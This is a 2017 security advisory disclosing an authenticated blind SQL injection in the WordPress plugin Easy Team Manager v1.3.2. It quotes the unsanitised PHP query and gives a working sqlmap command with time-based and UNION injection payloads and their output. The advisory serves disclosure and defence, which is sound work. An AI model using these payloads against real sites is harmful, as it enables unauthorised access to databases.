Advisory #: 194
Title: Blind SQL Injection in Wordpress Plugin Easy Team Manager v1.3.2
Author: Larry W. Cashdollar, @_larry0
Date: 2017-05-24
CVE-ID:[CVE-2017-1002023]
CWE:
Download Site: https://wordpress.org/plugins/easy-team-manager/
Vendor: https://daisythemes.com/
Vendor Notified: 2017-05-24
Vendor Contact: web form contact
Advisory: http://www.vapidlabs.com/advisory.php?v=194
Description: Easy Team Manager helps you to create team members with their short descriptions, social profiles link with smooth hover effects.
Vulnerability:
The following code does not sanitize $_GET['id'] before making it part of an SQL statement in file ./easy-team-manager/inc/easy_team_manager_desc_edit.php: 85- global $wpdb; 86- $easy_team_manager_desc = $wpdb->get_results("SELECT *from ".$wpdb->prefix."easy_team_manager_description where id=".$_GET['id']); 87- foreach ($easy_team_manager_desc as $s ){ 88- $ind_name_detail = unserialize($s->name); 89- $socia_media = unserialize($s->social_media); 90: $id=$_GET['id']; 91- $ind_position = esc_attr($s->position); 92- $ind_image=$s->image; 93- $ind_email_detail = unserialize($s->email); 94- $ind_phone_detail = unserialize($s->phone); 95- $ind_desc = esc_attr(stripcslashes($s->ind_description)); This allows blind SQL injection via the id parameter by an authenticated user with edit team priveledges.
Export: JSON TEXT XML
Exploit Code:
  1. $ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=*' --load-cookies=./cookies.txt --level=4 --risk=3 --dbms=mysql
  2.  
  3. [08:39:09] [INFO] URI parameter '#1*' is 'MySQL UNION query (84) - 1 to 20 columns' injectable
  4. URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
  5. sqlmap identified the following injection point(s) with a total of 3115 HTTP(s) requests:
  6. ---
  7. Parameter: #1* (URI)
  8.     Type: AND/OR time-based blind
  9.     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
  10.     Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=(CASE WHEN (3623=3623) THEN SLEEP(5) ELSE 3623 END)
  11.     Type: UNION query
  12.     Title: MySQL UNION query (84) - 5 columns
  13.     Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=-5307 UNION ALL SELECT 84,CONCAT(0x7170787a71,0x58795a426e467457726744686879446f4e4d7a576a464758516e6765526549536279426759527443,0x7178787171),84,84,84#
  14. ---
  15. [08:39:15] [INFO] the back-end DBMS is MySQL
  16. web server operating system: Linux Ubuntu 16.04 (xenial)
  17. web application technology
  18. : Apache 2.4.18
  19. back-end DBMS: MySQL >= 5.0.12
  20. [08:39:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
  21.  
  22. [*] shutting down at 08:39:15
Screen Shots:
Notes: